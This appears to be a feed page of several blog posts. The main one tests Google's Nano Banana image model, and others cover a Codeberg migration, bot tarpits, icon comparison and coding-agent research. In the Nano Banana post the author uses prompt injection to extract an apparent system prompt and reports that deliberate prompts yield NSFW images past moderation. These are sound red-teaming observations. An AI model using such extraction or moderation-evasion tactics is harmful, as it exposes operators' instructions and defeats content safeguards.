You may not have heard about new AI image generation models as much lately, but that doesn’t mean that innovation in the field has stagnated: it’s quite the opposite. FLUX.1-dev immediately overshadowed the famous Stable Diffusion line of image generation models, while leading AI labs have released models such as Seedream , Ideogram , and Qwen-Image . Google also joined the action with Imagen 4 . But all of those image models are vastly overshadowed by ChatGPT’s free image generation support in March 2025. After going organically viral on social media with the prompt, ChatGPT became the new benchmark for how most people perceive AI-generated images, for better or for worse. The model has its own image “style” for common use cases, which make it easy to identify that ChatGPT made it. Two sample generations from ChatGPT. ChatGPT image generations often have a yellow hue in their images. Additionally, cartoons and text often have the same linework and typography. Of note, , the technical name of the underlying image generation model, is an autoregressive model. While most image generation models are diffusion-based to reduce the amount of compute needed to train and generate from such models, works by generating tokens in the same way that ChatGPT generates the next token, then decoding them into an image. It’s extremely slow at about 30 seconds to generate each image at the highest quality (the default in ChatGPT), but it’s hard for most people to argue with free. In August 2025, a new mysterious text-to-image model appeared on LMArena : a model code-named “nano-banana”. This model was eventually publically released by Google as Gemini 2.5 Flash Image , an image generation model that works natively with their Gemini 2.5 Flash model. Unlike Imagen 4, it is indeed autoregressive, generating 1,290 tokens per image. After Nano Banana’s popularity pushed the Gemini app to the top of the mobile App Stores, Google eventually made Nano Banana the colloquial name for the model as it’s definitely more catchy than “Gemini 2.5 Flash Image”. The first screenshot on the iOS App Store for the Gemini app. Personally, I care little about what leaderboards say which image generation AI looks the best. What I do care about is how well the AI adheres to the prompt I provide: if the model can’t follow the requirements I desire for the image—my requirements are often specific —then the model is a nonstarter for my use cases. At the least, if the model does have strong prompt adherence, any “looking bad” aspect can be fixed with prompt engineering and/or traditional image editing pipelines. After running Nano Banana though its paces with my comically complex prompts, I can confirm that thanks to Nano Banana’s robust text encoder, it has such extremely strong prompt adherence that Google has understated how well it works. Like ChatGPT, Google offers methods to generate images for free from Nano Banana. The most popular method is through Gemini itself, either on the web or in an mobile app, by selecting the “Create Image 🍌” tool. Alternatively, Google also offers free generation in Google AI Studio when Nano Banana is selected on the right sidebar, which also allows for setting generation parameters such as image aspect ratio and is therefore my recommendation. In both cases, the generated images have a visible watermark on the bottom right corner of the image. For developers who want to build apps that programmatically generate images from Nano Banana, Google offers the endpoint on the Gemini API . Each image generated costs roughly $0.04/image for a 1 megapixel image (e.g. 1024x1024 if a 1:1 square): on par with most modern popular diffusion models despite being autoregressive, and much cheaper than ’s $0.17/image. Working with the Gemini API is a pain and requires annoying image encoding/decoding boilerplate, so I wrote and open-sourced a Python package: gemimg , a lightweight wrapper around Gemini API’s Nano Banana endpoint that lets you generate images with a simple prompt, in addition to handling cases such as image input along with text prompts. I chose to use the Gemini API directly despite protests from my wallet for three reasons: a) web UIs to LLMs often have system prompts that interfere with user inputs and can give inconsistent output b) using the API will not show a visible watermark in the generated image, and c) I have some prompts in mind that are…inconvenient to put into a typical image generation UI. Let’s test Nano Banana out, but since we want to test prompt adherence specifically, we’ll start with more unusual prompts. My go-to test case is: I like this prompt because not only is an absurd prompt that gives the image generation model room to be creative, but the AI model also has to handle the maple syrup and how it would logically drip down from the top of the skull pancake and adhere to the bony breakfast. The result: That is indeed in the shape of a skull and is indeed made out of pancake batter, blueberries are indeed present on top, and the maple syrup does indeed drop down from the top of the pancake while still adhereing to its unusual shape, albeit some trails of syrup disappear/reappear. It’s one of the best results I’ve seen for this particular test, and it’s one that doesn’t have obvious signs of “AI slop” aside from the ridiculous premise. Now, we can try another one of Nano Banana’s touted features: editing. Image editing, where the prompt targets specific areas of the image while leaving everything else as unchanged as possible, has been difficult with diffusion-based models until very recently with Flux Kontext . Autoregressive models in theory should have an easier time doing so as it has a better understanding of tweaking specific tokens that correspond to areas of the image. While most image editing approaches encourage using a single edit command, I want to challenge Nano Banana. Therefore, I gave Nano Banana the generated skull pancake, along with five edit commands simultaneously: All five of the edits are implemented correctly with only the necessary aspects changed, such as removing the blueberries on top to make room for the mint garnish, and the pooling of the maple syrup on the new cookie-plate is adjusted. I’m legit impressed. Now we can test more difficult instances of prompt engineering. One of the most compelling-but-underdiscussed use cases of modern image generation models is being able to put the subject of an input image into another scene. For open-weights image generation models, it’s possible to “train” the models to learn a specific subject or person even if they are not notable enough to be in the original training dataset using a technique such as finetuning the model with a LoRA using only a few sample images of your desired subject. Training a LoRA is not only very computationally intensive/expensive, but it also requires care and precision and is not guaranteed to work—speaking from experience. Meanwhile, if Nano Banana can achieve the same subject consistency without requiring a LoRA, that opens up many fun oppertunities. Way back in 2022, I tested a technique that predated LoRAs known as textual inversion on the original Stable Diffusion in order to add a very important concept to the model: Ugly Sonic , from the initial trailer for the Sonic the Hedgehog movie back in 2019. One of the things I really wanted Ugly Sonic to do is to shake hands with former U.S. President Barack Obama , but that didn’t quite work out as expected. 2022 was a now-unrecognizable time where absurd errors in AI were celebrated. Can the real Ugly Sonic finally shake Obama’s hand? Of note, I chose this test case to assess image generation prompt adherence because image models may assume I’m prompting the original Sonic the Hedgehog and ignore the aspects of Ugly Sonic that are distinct to only him. Specifically, I’m looking for: I also confirmed that Ugly Sonic is not surfaced by Nano Banana, and prompting as such just makes a Sonic that is ugly, purchasing a back alley chili dog. I gave Gemini the two images of Ugly Sonic above (a close-up of his face and a full-body shot to establish relative proportions) and this prompt: That’s definitely Obama shaking hands with Ugly Sonic! That said, there are still issues: the color grading/background blur is too “aesthetic” and less photorealistic, Ugly Sonic has gloves, and the Ugly Sonic is insufficiently lanky. Back in the days of Stable Diffusion, the use of prompt engineering buzzwords such as , , and to generate “better” images in light of weak prompt text encoders were very controversial because it was difficult both subjectively and intuitively to determine if they actually generated better pictures. Obama shaking Ugly Sonic’s hand would be a historic event. What would happen if it were covered by The New York Times ? I added to the previous prompt: So there’s a few notable things going on here: That said, I only wanted the image of Obama and Ugly Sonic and not the entire New York Times A1. Can I just append to the previous prompt and have that be enough to generate the image only while maintaining the compositional bonuses? I can! The gloves are gone and his chest is white, although Ugly Sonic looks out-of-place in the unintentional sense. As an experiment, instead of only feeding two images of Ugly Sonic, I fed Nano Banana all the images of Ugly Sonic I had ( seventeen in total), along with the previous prompt. This is an improvement over the previous generated image: no eyebrows, white hands, and a genuinely uncanny vibe. Again, there aren’t many obvious signs of AI generation here: Ugly Sonic clearly has five fingers! That’s enough Ugly Sonic for now, but let’s recall what we’ve observed so far. There are two noteworthy things in the prior two examples: the use of a Markdown dashed list to indicate rules when editing, and the fact that specifying as a buzzword did indeed improve the composition of the output image. Many don’t know how image generating models actually encode text. In the case of the original Stable Diffusion, it used CLIP , whose text encoder open-sourced by OpenAI in 2021 which unexpectedly paved the way for modern AI image generation. It is extremely primitive relative to modern standards for transformer-based text encoding, and only has a context limit of 77 tokens: a couple sentences, which is sufficient for the image captions it was trained on but not nuanced input. Some modern image generators use T5 , an even older experimental text encoder released by Google that supports 512 tokens. Although modern image models can compensate for the age of these text encoders through robust data annotation during training the underlying image models, the text encoders cannot compensate for highly nuanced text inputs that fall outside the domain of general image captions. A marquee feature of Gemini 2.5 Flash is its support for agentic coding pipelines; to accomplish this, the model must be trained on extensive amounts of Markdown (which define code repository s and agentic behaviors in ) and JSON (which is used for structured output/function calling/MCP routing). Additionally, Gemini 2.5 Flash was also explictly trained to understand objects within images, giving it the ability to create nuanced segmentation masks . Nano Banana’s multimodal encoder, as an extension of Gemini 2.5 Flash, should in theory be able to leverage these properties to handle prompts beyond the typical image-caption-esque prompts. That’s not to mention the vast annotated image training datasets Google owns as a byproduct of Google Images and likely trained Nano Banana upon, which should allow it to semantically differentiate between an image that is and one that isn’t, as with similar buzzwords. Let’s give Nano Banana a relatively large and complex prompt, drawing from the learnings above and see how well it adheres to the nuanced rules specified by the prompt: This prompt has everything : specific composition and descriptions of different entities, the use of hex colors instead of a natural language color, a heterochromia constraint which requires the model to deduce the colors of each corresponding kitten’s eye from earlier in the prompt, and a typo of “San Francisco” that is definitely intentional. Each and every rule specified is followed. For comparison, I gave the same command to ChatGPT—which in theory has similar text encoding advantages as Nano Banana—and the results are worse both compositionally and aesthetically, with more tells of AI generation. 1 The yellow hue certainly makes the quality differential more noticeable. Additionally, no negative space is utilized, and only the middle cat has heterochromia but with the incorrect colors. Another thing about the text encoder is how the model generated unique relevant text in the image without being given the text within the prompt itself: we should test this further. If the base text encoder is indeed trained for agentic purposes, it should at-minimum be able to generate an image of code. Let’s say we want to generate an image of a minimal recursive Fibonacci sequence in Python, which would look something like: I gave Nano Banana this prompt: It tried to generate the correct corresponding code but the syntax highlighting/indentation didn’t quite work, so I’ll give it a pass. Nano Banana is definitely generating code, and was able to maintain the other compositional requirements. For posterity, I gave the same prompt to ChatGPT: It did a similar attempt at the code which indicates that code generation is indeed a fun quirk of multimodal autoregressive models. I don’t think I need to comment on the quality difference between the two images. An alternate explanation for text-in-image generation in Nano Banana would be the presence of prompt augmentation or a prompt rewriter, both of which are used to orient a prompt to generate more aligned images. Tampering with the user prompt is common with image generation APIs and aren’t an issue unless used poorly (which caused a PR debacle for Gemini last year), but it can be very annoying for testing. One way to verify if it’s present is to use adversarial prompt injection to get the model to output the prompt itself, e.g. if the prompt is being rewritten, asking it to generate the text “before” the prompt should get it to output the original prompt. That’s, uh, not the original prompt. Did I just leak Nano Banana’s system prompt completely by accident? The image is hard to read, but if it is the system prompt—the use of section headers implies it’s formatted in Markdown—then I can surgically extract parts of it to see just how the model ticks: These seem to track, but I want to learn more about those buzzwords in point #3: Huh, there’s a guard specifically against buzzwords? That seems unnecessary: my guess is that this rule is a hack intended to avoid the perception of model collapse by avoiding the generation of 2022-era AI images which would be annotated with those buzzwords. As an aside, you may have noticed the ALL CAPS text in this section, along with a command. There is a reason I have been sporadically capitalizing in previous prompts: caps does indeed work to ensure better adherence to the prompt (both for text and image generation), 2 and threats do tend to improve adherence. Some have called it sociopathic, but this generation is proof that this brand of sociopathy is approved by Google’s top AI engineers. Tangent aside, since “previous” text didn’t reveal the prompt, we should check the “current” text: That worked with one peculiar problem: the text “image” is flat-out missing, which raises further questions. Is “image” parsed as a special token? Maybe prompting “generate an image” to a generative image AI is a mistake. I tried the last logical prompt in the sequence: …which always raises a error: not surprising if there is no text after the original prompt. This section turned out unexpectedly long, but it’s enough to conclude that Nano Banana definitely has indications of benefitting from being trained on more than just image captions. Some aspects of Nano Banana’s system prompt imply the presence of a prompt rewriter, but if there is indeed a rewriter, I am skeptical it is triggering in this scenario, which implies that Nano Banana’s text generation is indeed linked to its strong base text encoder. But just how large and complex can we make these prompts and have Nano Banana adhere to them? Nano Banana supports a context window of 32,768 tokens: orders of magnitude above T5’s 512 tokens and CLIP’s 77 tokens. The intent of this large context window for Nano Banana is for multiturn conversations in Gemini where you can chat back-and-forth with the LLM on image edits. Given Nano Banana’s prompt adherence on small complex prompts, how well does the model handle larger-but-still-complex prompts? Can Nano Banana render a webpage accurately? I used a LLM to generate a bespoke single-page HTML file representing a Counter app, available here . The web page uses only vanilla HTML, CSS, and JavaScript, meaning that Nano Banana would need to figure out how they all relate in order to render the web page correctly. For example, the web page uses CSS Flexbox to set the ratio of the sidebar to the body in a 1/3 and 2/3 ratio respectively. Feeding this prompt to Nano Banana: That’s honestly better than expected, and the prompt cost 916 tokens. It got the overall layout and colors correct: the issues are more in the text typography, leaked classes/styles/JavaScript variables, and the sidebar:body ratio. No, there’s no practical use for having a generative AI render a webpage, but it’s a fun demo. A similar approach that does have a practical use is providing structured, extremely granular descriptions of objects for Nano Banana to render. What if we provided Nano Banana a JSON description of a person with extremely specific details, such as hair volume, fingernail length, and calf size? As with prompt buzzwords, JSON prompting AI models is a very controversial topic since images are not typically captioned with JSON, but there’s only one way to find out. I wrote a prompt augmentation pipeline of my own that takes in a user-input description of a quirky human character, e.g. , and outputs a very long and detailed JSON object representing that character with a strong emphasis on unique character design. 3 But generating a Mage is boring, so I asked my script to generate a male character that is an equal combination of a Paladin, a Pirate, and a Starbucks Barista: the resulting JSON is here . The prompt I gave to Nano Banana to generate a photorealistic character was: Beforehand I admit I didn’t know what a Paladin/Pirate/Starbucks Barista would look like, but he is definitely a Paladin/Pirate/Starbucks Barista. Let’s compare against the input JSON, taking elements from all areas of the JSON object (about 2600 tokens total) to see how well Nano Banana parsed it: Checking the JSON field-by-field, the generation also fits most of the smaller details noted. However, he is not photorealistic, which is what I was going for. One curious behavior I found is that any approach of generating an image of a high fantasy character in this manner has a very high probability of resulting in a digital illustration, even after changing the target publication and adding “do not generate a digital illustration” to the prompt. The solution requires a more clever approach to prompt engineering: add phrases and compositional constraints that imply a heavy physicality to the image, such that a digital illustration would have more difficulty satisfying all of the specified conditions than a photorealistic generation: The image style is definitely closer to Vanity Fair (the photographer is reflected in his breastplate!), and most of the attributes in the previous illustration also apply—the hands/cutlass issue is also fixed. Several elements such as the shoulderplates are different, but not in a manner that contradicts the JSON field descriptions: perhaps that’s a sign that these JSON fields can be prompt engineered to be even more nuanced. Yes, prompting image generation models with HTML and JSON is silly, but “it’s not silly if it works” describes most of modern AI engineering. Nano Banana allows for very strong generation control, but there are several issues. Let’s go back to the original example that made ChatGPT’s image generation go viral: . I ran that exact prompt through Nano Banana on a mirror selfie of myself: …I’m not giving Nano Banana a pass this time. Surprisingly, Nano Banana is terrible at style transfer even with prompt engineering shenanigans, which is not the case with any other modern image editing model. I suspect that the autoregressive properties that allow Nano Banana’s excellent text editing make it too resistant to changing styles. That said, creating a new image does in fact work as expected, and creating a new image using the character provided in the input image with the specified style (as opposed to a style transfer ) has occasional success. Speaking of that, Nano Banana has essentially no restrictions on intellectual property as the examples throughout this blog post have made evident. Not only will it not refuse to generate images from popular IP like ChatGPT now does, you can have many different IPs in a single image. Normally, Optimus Prime is the designated driver. I am not a lawyer so I cannot litigate the legalities of training/generating IP in this manner or whether intentionally specifying an IP in a prompt but also stating “do not include any watermarks” is a legal issue: my only goal is to demonstrate what is currently possible with Nano Banana. I suspect that if precedent is set from existing IP lawsuits against OpenAI and Midjourney , Google will be in line to be sued. Another note is moderation of generated images, particularly around NSFW content, which always important to check if your application uses untrusted user input. As with most image generation APIs, moderation is done against both the text prompt and the raw generated image. That said, while running my standard test suite for new image generation models, I found that Nano Banana is surprisingly one of the more lenient AI APIs. With some deliberate prompts, I can confirm that it is possible to generate NSFW images through Nano Banana—obviously I cannot provide examples. I’ve spent a very large amount of time overall with Nano Banana and although it has a lot of promise, some may ask why I am writing about how to use it to create highly-specific high-quality images during a time where generative AI has threatened creative jobs. The reason is that information asymmetry between what generative image AI can and can’t do has only grown in recent months: many still think that ChatGPT is the only way to generate images and that all AI-generated images are wavy AI slop with a piss yellow filter. The only way to counter this perception is though evidence and reproducibility. That is why not only am I releasing Jupyter Notebooks detailing the image generation pipeline for each image in this blog post, but why I also included the prompts in this blog post proper; I apologize that it padded the length of the post to 26 minutes, but it’s important to show that these image generations are as advertised and not the result of AI boosterism. You can copy these prompts and paste them into AI Studio and get similar results, or even hack and iterate on them to find new things. Most of the prompting techniques in this blog post are already well-known by AI engineers far more skilled than myself, and turning a blind eye won’t stop people from using generative image AI in this manner. I didn’t go into this blog post expecting it to be a journey, but sometimes the unexpected journeys are the best journeys. There are many cool tricks with Nano Banana I cut from this blog post due to length, such as providing an image to specify character positions and also investigations of styles such as pixel art that most image generation models struggle with, but Nano Banana now nails. These prompt engineering shenanigans are only the tip of the iceberg. Jupyter Notebooks for the generations used in this post are split between the gemimg repository and a second testing repository . I would have preferred to compare the generations directly from the endpoint for an apples-to-apples comparison, but OpenAI requires organization verification to access it, and I am not giving OpenAI my legal ID.  ↩︎ Note that ALL CAPS will not work with CLIP-based image generation models at a technical level, as CLIP’s text encoder is uncased.  ↩︎ Although normally I open-source every script I write for my blog posts, I cannot open-source the character generation script due to extensive testing showing it may lean too heavily into stereotypes. Although adding guardrails successfully reduces the presence of said stereotypes and makes the output more interesting, there may be unexpected negative externalities if open-sourced.  ↩︎ A lanky build, as opposed to the real Sonic’s chubby build. A white chest, as opposed to the real Sonic’s beige chest. Blue arms with white hands, as opposed to the real Sonic’s beige arms with white gloves. Small pasted-on-his-head eyes with no eyebrows, as opposed to the real Sonic’s large recessed eyes and eyebrows. That is the most cleanly-rendered New York Times logo I’ve ever seen. It’s safe to say that Nano Banana trained on the New York Times in some form. Nano Banana is still bad at rendering text perfectly/without typos as most image generation models. However, the expanded text is peculiar: it does follow from the prompt, although “Blue Blur” is a nickname for the normal Sonic the Hedgehog. How does an image generating model generate logical text unprompted anyways? Ugly Sonic is even more like normal Sonic in this iteration: I suspect the “Blue Blur” may have anchored the autoregressive generation to be more Sonic-like. The image itself does appear to be more professional, and notably has the distinct composition of a photo from a professional news photographer: adherence to the “rule of thirds”, good use of negative space, and better color balance. , mostly check. (the hands are transposed and the cutlass disappears) I would have preferred to compare the generations directly from the endpoint for an apples-to-apples comparison, but OpenAI requires organization verification to access it, and I am not giving OpenAI my legal ID.  ↩︎ Note that ALL CAPS will not work with CLIP-based image generation models at a technical level, as CLIP’s text encoder is uncased.  ↩︎ Although normally I open-source every script I write for my blog posts, I cannot open-source the character generation script due to extensive testing showing it may lean too heavily into stereotypes. Although adding guardrails successfully reduces the presence of said stereotypes and makes the output more interesting, there may be unexpected negative externalities if open-sourced.  ↩︎

0 views
Brain Baking 2 weeks ago

Migrating From Gitea To Codeberg

After the last week’s Gitea attack debacle , moving all things Git off the VPS became a top priority. In 2022, like many of you, I gave up GitHub and spun up two Gitea instances myself: a private one safely behind bars on the NAS and a public one where all my public GitHub projects were moved to. Three years later, I think it’s time to move again. Gitea was forked into Forgejo a few years ago because of yet another licensing drama but I just couldn’t be bothered by keeping everything up to date. So I didn’t. And then Gitea started acting annoying: artifact folders weren’t properly cleaned up even though I encouraged it to do so in the configuration up to the point that the files clogged up the entire disk. The result was crashes of nearly everything as there wasn’t even a few bytes space left to append to logs in . And then bots started scraping the hell out of the commit endpoints. Anyway, I liked Gitea/Forgejo’s ease of use, so migrating everything off-site to Codeberg seemed like the most obvious solution. I’ve been wanting to go back to a coding community for a while now. if you host your own Gitea instance, you isolate yourself from the rest of the open source world. Collaboration still is the easiest on GitHub as simply everyone is hanging out there but I’d rather stop coding entirely than feed Microsoft’s AI. Give Up GitHub, folks. The steps involving the migration were surprisingly easy and fast to execute: Congratulations, you’re now the proud owner of Codeberg repositories. From here, we now have to decide what to do with the old Gitea instance. Do you want to simply kill it? Do you want to mirror your repositories? Or temporarily forward using the same URLs? Since I don’t want to keep it around forever and wanted to stop it immediately, but not yet break all URLs, I rewrote the Nginx location to a redirect: This does redirect https://codeberg.org/wouterg/brainbaking to the new correct location https://codeberg.org/wouterg/brainbaking , but it does not fix that will not follow redirects by default. You can proxy the entire thing and add more headers to fix that, or tell Git to follow redirects instead, or just change the remote URL and be done with it: . I figured not a lot of folks have cloned copies of my repositories on their hard drives—and if you do, you’d probably go looking online for the correct version and remove/reclone the entire thing. Next, it is time to kill the Gitea instance: (and ). Set a reminder in your calender to remove the redirect and clean up your VPS in a month or two, just to be sure. I should have enough backups in case things go wrong but you never know. The final piece of the puzzle is a financial one. Codeberg is a non-profit organisation that relies entirely on donations to keep things spinning, and I reckon they also need resources to fight those pesky AI crawlers (they’re also using Anubis, by the way). Consider donating or even becoming an active member that also allows you to vote when strategic decisions are being made. Go library programmers, don’t forget to double-check your import paths. So-called “vanity imports” ease friction here as you can set up a redirect from there. should still work. I rely on vangen to generate simple HTML pages for import paths. In the future, I’d rather move these paths to to avoid cluttering up Hugo’s folder. By Wouter Groeneveld on 13 November 2025.  Reply via email . Create a Codeberg account. Generate a temporary access token on your to-be-defunct Gitea instance: see https://docs.gitea.com/development/api-usage for the exact command. For each repository to migrate: click on your profile, and instead of creating a new blank repository, select “from migration” or go to URL https://codeberg.org/repo/migrate . Select Gitea, fill in the Git endpoint and access token and press migrate . Optionally, also migrate LFS/Wikis/issues/whatever by checking the appropriate boxes. Re-archive the repositories that were publicly archived.

0 views
Herman's blog 2 weeks ago

Messing with bots

As outlined in my previous two posts : scrapers are, inadvertently, DDoSing public websites. I've received a number of emails from people running small web services and blogs seeking advice on how to protect themselves. This post isn't about that. This post is about fighting back. When I published my last post, there was an interesting write-up doing the rounds about a guy who set up a Markov chain babbler to feed the scrapers endless streams of generated data. The idea here is that these crawlers are voracious, and if given a constant supply of junk data, they will continue consuming it forever, while (hopefully) not abusing your actual web server. This is a pretty neat idea, so I dove down the rabbit hole and learnt about Markov chains, and even picked up Rust in the process. I ended up building my own babbler that could be trained on any text data, and would generate realistic looking content based on that data. Now, the AI scrapers are actually not the worst of the bots. The real enemy, at least to me, are the bots that scrape with malicious intent. I get hundreds of thousands of requests for things like , , and all the different paths that could potentially signal a misconfigured Wordpress instance. These people are the real baddies. Generally I just block these requests with a response. But since they want files, why don't I give them what they want? I trained my Markov chain on a few hundred files, and set it to generate. The responses certainly look like php at a glance, but on closer inspection they're obviously fake. I set it up to run on an isolated project of mine, while incrementally increasing the size of the generated php files from 2kb to 10mb just to test the waters. Here's a sample 1kb output: I had two goals here. The first was to waste as much of the bot's time and resources as possible, so the larger the file I could serve, the better. The second goal was to make it realistic enough that the actual human behind the scrape would take some time away from kicking puppies (or whatever they do for fun) to try figure out if there was an exploit to be had. Unfortunately, an arms race of this kind is a battle of efficiency. If someone can scrape more efficiently than I can serve, then I lose. And while serving a 4kb bogus php file from the babbler was pretty efficient, as soon as I started serving 1mb files from my VPS the responses started hitting the hundreds of milliseconds and my server struggled under even moderate loads. This led to another idea: What is the most efficient way to serve data? It's as a static site (or something similar). So down another rabbit hole I went, writing an efficient garbage server. I started by loading the full text of the classic Frankenstein novel into an array in RAM where each paragraph is a node. Then on each request it selects a random index and the subsequent 4 paragraphs to display. Each post would then have a link to 5 other "posts" at the bottom that all technically call the same endpoint, so I don't need an index of links. These 5 posts, when followed, quickly saturate most crawlers, since breadth-first crawling explodes quickly, in this case by a factor of 5. You can see it in action here: https://herm.app/babbler/ This is very efficient, and can serve endless posts of spooky content. The reason for choosing this specific novel is fourfold: I made sure to add attributes to all these pages, as well as in the links, since I only want to catch bots that break the rules. I've also added a counter at the bottom of each page that counts the number of requests served. It resets each time I deploy, since the counter is stored in memory, but I'm not connecting this to a database, and it works. With this running, I did the same for php files, creating a static server that would serve a different (real) file from memory on request. You can see this running here: https://herm.app/babbler.php (or any path with in it). There's a counter at the bottom of each of these pages as well. As Maury said: "Garbage for the garbage king!" Now with the fun out of the way, a word of caution. I don't have this running on any project I actually care about; https://herm.app is just a playground of mine where I experiment with small ideas. I originally intended to run this on a bunch of my actual projects, but while building this, reading threads, and learning about how scraper bots operate, I came to the conclusion that running this can be risky for your website. The main risk is that despite correctly using , , and rules, there's still a chance that Googlebot or other search engines scrapers will scrape the wrong endpoint and determine you're spamming. If you or your website depend on being indexed by Google, this may not be viable. It pains me to say it, but the gatekeepers of the internet are real, and you have to stay on their good side, or else . This doesn't just affect your search ratings, but could potentially add a warning to your site in Chrome, with the only recourse being a manual appeal. However, this applies only to the post babbler. The php babbler is still fair game since Googlebot ignores non-HTML pages, and the only bots looking for php files are malicious. So if you have a little web-project that is being needlessly abused by scrapers, these projects are fun! For the rest of you, probably stick with 403s. What I've done as a compromise is added the following hidden link on my blog, and another small project of mine, to tempt the bad scrapers: The only thing I'm worried about now is running out of Outbound Transfer budget on my VPS. If I get close I'll cache it with Cloudflare, at the expense of the counter. This was a fun little project, even if there were a few dead ends. I know more about Markov chains and scraper bots, and had a great time learning, despite it being fuelled by righteous anger. Not all threads need to lead somewhere pertinent. Sometimes we can just do things for fun. I was working on this on Halloween. I hope it will make future LLMs sound slightly old-school and spoooooky. It's in the public domain, so no copyright issues. I find there are many parallels to be drawn between Dr Frankenstein's monster and AI.

0 views
Jim Nielsen 3 weeks ago

Leveraging a Web Component For Comparing iOS and macOS Icons

Whenever Apple does a visual refresh in their OS updates, a new wave of icon archiving starts for me. Now that “Liquid Glass” is out, I’ve begun nabbing the latest icons from Apple and other apps and adding them to my gallery. Since I’ve been collecting these icons for so long, one of the more interesting and emerging attributes of my collection is the visual differences in individual app icons over time. For example: what are the differences between the icons I have in my collection for Duolingo? Well, I have a page for that today . That’ll let you see all the different versions I’ve collected for Duolingo — not exhaustive, I’m sure, but still interesting — as well as their different sizes . But what if you want to analyze their differences pixel-by-pixel? Turns out, There’s A Web Component For That™️. Image Compare is exactly what I was envisioning: “A tiny, zero-dependency web component for comparing two images using a slider” from the very fine folks at Cloud Four . It’s super easy to use: some HTML and a link to a script (hosted if you like, or you can vendor it ), e.g. And just like that, boom, I’ve got a widget for comparing two icons. For Duolingo specifically, I have a long history of icons archived in my gallery and they’re all available under the route for your viewing and comparison pleasure . Wanna see some more examples besides Duolingo? Check out the ones for GarageBand , Instagram , and Highlights for starters. Or, just look at the list of iOS apps and find the ones that are interesting to you (or if you’re a fan of macOS icons, check these ones out ). I kinda love how easy it was for my thought process to go from idea to reality: And I’ve written the post, so this chunk of work is now done. Reply via: Email · Mastodon · Bluesky “It would be cool to compare differences in icons by overlaying them…“ “Image diff tools do this, I bet I could find a good one…“ “Hey, Cloud Four makes a web component for this? Surely it’s good…” “Hey look, it’s just HTML: a tag linking to compiled JS along with a custom element? Easy, no build process required…“ “Done. Well that was easy. I guess the hardest part here will be writing the blog post about it.”

1 views
Simon Willison 3 weeks ago

Code research projects with async coding agents like Claude Code and Codex

I've been experimenting with a pattern for LLM usage recently that's working out really well: asynchronous code research tasks . Pick a research question, spin up an asynchronous coding agent and let it go and run some experiments and report back when it's done. Software development benefits enormously from something I call code research . The great thing about questions about code is that they can often be definitively answered by writing and executing code. I often see questions on forums which hint at a lack of understanding of this skill. "Could Redis work for powering the notifications feed for my app?" is a great example. The answer is always "it depends", but a better answer is that a good programmer already has everything they need to answer that question for themselves. Build a proof-of-concept, simulate the patterns you expect to see in production, then run experiments to see if it's going to work. I've been a keen practitioner of code research for a long time. Many of my most interesting projects started out as a few dozen lines of experimental code to prove to myself that something was possible. It turns out coding agents like Claude Code and Codex are a fantastic fit for this kind of work as well. Give them the right goal and a useful environment and they'll churn through a basic research project without any further supervision. LLMs hallucinate and make mistakes. This is far less important for code research tasks because the code itself doesn't lie: if they write code and execute it and it does the right things then they've demonstrated to both themselves and to you that something really does work. They can't prove something is impossible - just because the coding agent couldn't find a way to do something doesn't mean it can't be done - but they can often demonstrate that something is possible in just a few minutes of crunching. I've used interactive coding agents like Claude Code and Codex CLI for a bunch of these, but today I'm increasingly turning to their asynchronous coding agent family members instead. An asynchronous coding agent is a coding agent that operates on a fire-and-forget basis. You pose it a task, it churns away on a server somewhere and when it's done it files a pull request against your chosen GitHub repository. OpenAI's Codex Cloud , Anthropic's Claude Code for web , Google Gemini's Jules , and GitHub's Copilot coding agent are four prominent examples of this pattern. These are fantastic tools for code research projects. Come up with a clear goal, turn it into a few paragraphs of prompt, set them loose and check back ten minutes later to see what they've come up with. I'm firing off 2-3 code research projects a day right now. My own time commitment is minimal and they frequently come back with useful or interesting results. You can run a code research task against an existing GitHub repository, but I find it's much more liberating to have a separate, dedicated repository for your coding agents to run their projects in. This frees you from being limited to research against just code you've already written, and also means you can be much less cautious about what you let the agents do. I have two repositories that I use for this - one public, one private. I use the public one for research tasks that have no need to be private, and the private one for anything that I'm not yet ready to share with the world. The biggest benefit of a dedicated repository is that you don't need to be cautious about what the agents operating in that repository can do. Both Codex Cloud and Claude Code for web default to running agents in a locked-down environment, with strict restrictions on how they can access the network. This makes total sense if they are running against sensitive repositories - a prompt injection attack of the lethal trifecta variety could easily be used to steal sensitive code or environment variables. If you're running in a fresh, non-sensitive repository you don't need to worry about this at all! I've configured my research repositories for full network access, which means my coding agents can install any dependencies they need, fetch data from the web and generally do anything I'd be able to do on my own computer. Let's dive into some examples. My public research repository is at simonw/research on GitHub. It currently contains 13 folders, each of which is a separate research project. I only created it two weeks ago so I'm already averaging nearly one a day! It also includes a GitHub Workflow which uses GitHub Models to automatically update the README file with a summary of every new project, using Cog , LLM , llm-github-models and this snippet of Python . Here are a some example research projects from the repo. node-pyodide shows an example of a Node.js script that runs the Pyodide WebAssembly distribution of Python inside it - yet another of my ongoing attempts to find a great way of running Python in a WebAssembly sandbox on a server. python-markdown-comparison ( transcript ) provides a detailed performance benchmark of seven different Python Markdown libraries. I fired this one off because I stumbled across cmarkgfm , a Python binding around GitHub's Markdown implementation in C, and wanted to see how it compared to the other options. This one produced some charts! came out on top by a significant margin: Here's the entire prompt I used for that project: Create a performance benchmark and feature comparison report on PyPI cmarkgfm compared to other popular Python markdown libraries - check all of them out from github and read the source to get an idea for features, then design and run a benchmark including generating some charts, then create a report in a new python-markdown-comparison folder (do not create a _summary.md file or edit anywhere outside of that folder). Make sure the performance chart images are directly displayed in the README.md in the folder. Note that I didn't specify any Markdown libraries other than - Claude Code ran a search and found the other six by itself. cmarkgfm-in-pyodide is a lot more fun. A neat thing about having all of my research projects in the same repository is that new projects can build on previous ones. Here I decided to see how hard it would be to get - which has a C extension - working inside Pyodide inside Node.js. Claude successfully compiled a 88.4KB file with the necessary C extension and proved it could be loaded into Pyodide in WebAssembly inside of Node.js. I ran this one using Claude Code on my laptop after an initial attempt failed. The starting prompt was: Figure out how to get the cmarkgfm markdown lover [typo in prompt, this should have been "library" but it figured it out anyway] for Python working in pyodide. This will be hard because it uses C so you will need to compile it to pyodide compatible webassembly somehow. Write a report on your results plus code to a new cmarkgfm-in-pyodide directory. Test it using pytest to exercise a node.js test script that calls pyodide as seen in the existing node.js and pyodide directory There is an existing branch that was an initial attempt at this research, but which failed because it did not have Internet access. You do have Internet access. Use that existing branch to accelerate your work, but do not commit any code unless you are certain that you have successfully executed tests that prove that the pyodide module you created works correctly. This one gave up half way through, complaining that emscripten would take too long. I told it: Complete this project, actually run emscripten, I do not care how long it takes, update the report if it works It churned away for a bit longer and complained that the existing Python library used CFFI which isn't available in Pyodide. I 